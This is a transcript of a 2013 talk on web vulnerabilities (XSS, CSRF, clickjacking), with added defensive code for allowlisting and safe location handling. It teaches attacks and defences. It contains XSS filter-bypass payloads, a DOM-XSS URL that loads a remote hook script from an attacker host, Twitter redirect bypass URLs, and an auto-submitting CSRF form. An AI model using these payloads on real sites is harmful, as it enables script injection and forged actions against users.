Three vulnerabilities in web apps
DESCRIPTION
Presentation of three web application vulnerabilities, in Swedish. Given at GeekMeet Stockholm, January 2013.
TRANSCRIPT

Three vulnerabilities in web apps
@johnwilander, GeekMeet 2013

Three vulnerabilities in web apps:
• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery (CSRF)
• Clickjacking

Over 50 % are XSS
Source: IBM X-Force 2012 Mid-year Trend and Risk Report, September 2012

Cross-Site Scripting: theory (diagram)

Cross-Site Scripting, type 1: reflected (diagram; delivered via phishing)

Cross-Site Scripting, type 2: stored (diagram)

Cross-Site Scripting, type 0: DOM-based (diagram; delivered via phishing)
No request to the server!
Single-page apps let injected scripts "linger" in the DOM.

https://secure.example.com/authentication#language=sv&country=SE
Never sent to the server
Always be careful when using data from the URL, especially anything after the #.

https://secure.example.com/authentication#language=<script src="http://attackr.se:3000/hook.js"></script>&country=SE
Would you click on …

https://secure.example.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&country=SE
Would you click on …

http://bit.ly/Yg4T32
Would you click on …

Filter out <script>?
http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts

```javascript
/**
 * Strips all script tags
 * @param {Object} value The text from which to strip script tags
 * @return {String} The stripped text
 */
stripScripts : function(v) {
    return !v ? v : String(v).replace(stripScriptsRe, "");
},

var ... , stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig,
```

Filter out <script>?

```html
<img src=1 onerror=alert(1)>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<body onload=alert('XSS')>
<table background="javascript:alert('XSS')">
¼script¾alert(¢XSS¢)¼/script¾
<video poster=javascript:alert(1)//
```
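An added example, not code from the talk: the stripScripts pattern is copied from the Ext JS snippet above, and next to it is the safer way to handle the `#language=...&country=...` fragment shown earlier, which is to parse it, allowlist the values and write them to the DOM as text. The `element` passed to `renderLocale` is a placeholder object standing in for a DOM node, and the hostile URL is constructed for the example.

```javascript
// Added example, not from the talk. The stripScripts pattern is copied from
// the Ext JS snippet above; everything else is illustration.
const stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig;

// Blocklist approach: removes <script>...</script> and nothing else, so every
// payload on the slide above passes through untouched.
function stripScripts(v) {
  return !v ? v : String(v).replace(stripScriptsRe, "");
}

// Parse "key=value&..." after the "#" of a URL. Nothing here reaches the
// server; the browser keeps the fragment to itself.
function parseFragment(href) {
  const hash = new URL(href).hash;             // e.g. "#language=sv&country=SE"
  return new URLSearchParams(hash.slice(1));   // undoes %3C, %20 and friends
}

// Allowlist approach: the only values accepted are two-letter codes.
// Anything else is dropped outright rather than "cleaned up".
const LANGUAGE_RE = /^[a-z]{2}$/;
const COUNTRY_RE = /^[A-Z]{2}$/;

function readLocaleFromHash(href) {
  const params = parseFragment(href);
  const language = params.get("language");
  const country = params.get("country");
  return {
    language: LANGUAGE_RE.test(language ?? "") ? language : null,
    country: COUNTRY_RE.test(country ?? "") ? country : null,
  };
}

// Safe sink: textContent renders the value as text, so markup in it is shown,
// not parsed. Writing the same value to innerHTML is what makes type 0 XSS.
// `element` is any object with a textContent property (a DOM node in a browser).
function renderLocale(element, locale) {
  element.textContent = `${locale.language ?? "?"}/${locale.country ?? "?"}`;
  return element.textContent;
}

// Constructed inputs: the talk's benign URL and one carrying an <img onerror> payload.
const BENIGN_URL = "https://secure.example.com/authentication#language=sv&country=SE";
const HOSTILE_URL =
  "https://secure.example.com/authentication#language=%3Cimg%20src%3D1%20onerror%3Dalert(1)%3E&country=SE";
```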

"Come on, that kind of thing doesn't work, does it?"
Yes it does. Demo.

DOM-based XSS: Twitter, September 2010
Source: http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html

```javascript
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
```
What does this code do?
"https://twitter.com/#!/johnwilander".split("#!")[1] returns "/johnwilander"
window.location = "/johnwilander": a leading '/' keeps the domain but changes the path
So twitter.com/#!/johnwilander becomes twitter.com/johnwilander
Read more: http://kotowicz.net/absolute/

http://twitter.com/#!javascript:alert(document.domain);
Never sent to the server => DOM-based XSS

The Patch™

```javascript
var c = location.href.split("#!")[1];
if (c) {
  window.location = c.replace(":", "");
} else {
  return true;
}
```
replace() with a string pattern only replaces the first match.

http://twitter.com/#!javascript::alert(document.domain);

The 2nd Patch™

```javascript
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
```
/:/gi: regexp delimiters, global matching, ignores upper/lower case

Dooone?

http://twitter.com#!javascript&x58;alert(1)
HTML entity for ':'

The n:th Patch™ (this one works)

```javascript
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; }})(window);
```
Note that Twitter actually does the right thing: https://twitter.com/about/security
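An added example, not Twitter's code: the four versions of the "#!" redirect handler from the slides above, rewritten as pure functions of the page URL so that the two colon-based bypasses and the pathname fix can be checked in Node without a browser. Each function returns the value the handler would assign to `location`, and `navigationTarget` uses the URL parser to show where the browser would end up.

```javascript
// Added example, not Twitter's code: models of the handler versions shown
// in the talk. Each returns the value that would be assigned, or null.

// Original handler: whatever follows "#!" is assigned to window.location.
function redirectOriginal(href) {
  const a = href.split("#!")[1];
  return a ? a : null;                        // g.location = a
}

// The Patch(TM): a string pattern in String.prototype.replace only removes
// the first match, so a second colon survives.
function redirectPatch1(href) {
  const c = href.split("#!")[1];
  return c ? c.replace(":", "") : null;       // window.location = ...
}

// The 2nd Patch(TM): /:/gi removes every literal colon, but the handler still
// assigns a complete location, so any other spelling of ':' is a bypass.
function redirectPatch2(href) {
  const a = href.split("#!")[1];
  return a ? a.replace(/:/gi, "") : null;
}

// The n:th Patch(TM): assign only location.pathname. The fragment can then
// only ever pick a path on the current origin, never a scheme or a host.
function redirectFixed(href) {
  const a = href.split("#!")[1];
  if (!a) return null;
  const u = new URL(href);
  u.pathname = a;                             // g.location.pathname = a
  return u.href;
}

// Where the browser would navigate if `value` were assigned to location while
// on `base`: the URL parser resolves it exactly as a link would.
function navigationTarget(value, base) {
  return new URL(value, base);
}
```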

Solve problems like these the right way, with client-side encoding

https://github.com/chrisisbeef/jquery-encoder
• $.encoder.canonicalize(): throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS(): encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML(): encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute(): encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript(): encodes for safe usage in event handlers etc.
• $.encoder.encodeForURL(): encodes for safe usage in href etc.

Protection against XSS: Content Security Policy
http://www.w3.org/TR/CSP/

A new HTTP response header that says: only allow scripts from approved domains, and only allow scripts from files, i.e. no inline scripts.

'self' = same URL, protocol and port

Content-Security-Policy: default-src 'self'
Only load scripts, plugins, CSS, images, audio/video, frames, fonts and data from the site's own domain.

Content-Security-Policy: default-src 'self'; img-src *; script-src trusted.com
Accept images from any domain, scripts from trusted.com, and everything else only from the site's own domain.

CSRF: my favourite!

Cross-Site Request Forgery (diagram; delivered via phishing)

<img src="https://secure.example.com/logo.png" />
Is www.attackr.se allowed to load images like this?

<img src="https://secure.example.com/authentication#language=sv&country=SE" />
Is www.attackr.se allowed to load images like this?

<img src="https://secure.example.com/authentication#language=sv&country=SE" height=0 width=0 />
With img elements, www.attackr.se can silently send HTTP GET requests to any domain.

"What about HTTP POST, then?"

Demo (screenshots): two browser windows of a one-liner app, each with a "What's on your mind?" field and a POST button.
The user posts "I love OWASP!" and the feed shows "John: I love OWASP!".
In the second window "I hate OWASP!" is posted, and the user's feed shows "John: I hate OWASP!".

Demo (screenshot): the user is looking at a page that only says "Look at the lol cat!", while the feed shows "John: I hate OWASP!". The lol cat page contains:

```html
<form id="target" method="POST" action="https://1-liner.org/form">
  <input type="text" value="I hate OWASP!" name="oneLiner"/>
  <input type="submit" value="POST"/>
</form>
<script>
  $(document).ready(function() { $('#target').submit(); });
</script>
```

Diagram, csrfMulti.html: the page opens an invisible iframe loading csrfMulti0.html. After a wait, that frame shows target0.html and a new invisible iframe loads csrfMulti1.html; the chain continues through csrfMulti2.html and csrfMulti3.html until four invisible iframes hold target0.html, target1.html, target2.html and target3.html.

Demo: POST CSRF against REST/JSON

Clickjacking... or Likejacking or Followjacking or ...

Clickjacking demo

X-Frame-Options
http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx
http://tools.ietf.org/html/draft-gondrom-frame-options-01

No page may load me in an iframe, or only pages on my own domain may load me in an iframe.

X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
(Coming: X-Frame-Options: ALLOW-FROM [list])

Interested?
• Join your local OWASP chapter: https://www.owasp.org/index.php/OWASP_Chapter
• Start following these people on Twitter: @WisecWisec @0x6D6172696F @garethheyes @securityninja @jeremiahg @kkotowicz @webtonull @manicode @securityshell
• Start hacking on your own, it's fun! Best place to start? Your own sites, of course. Just keep it legal ;)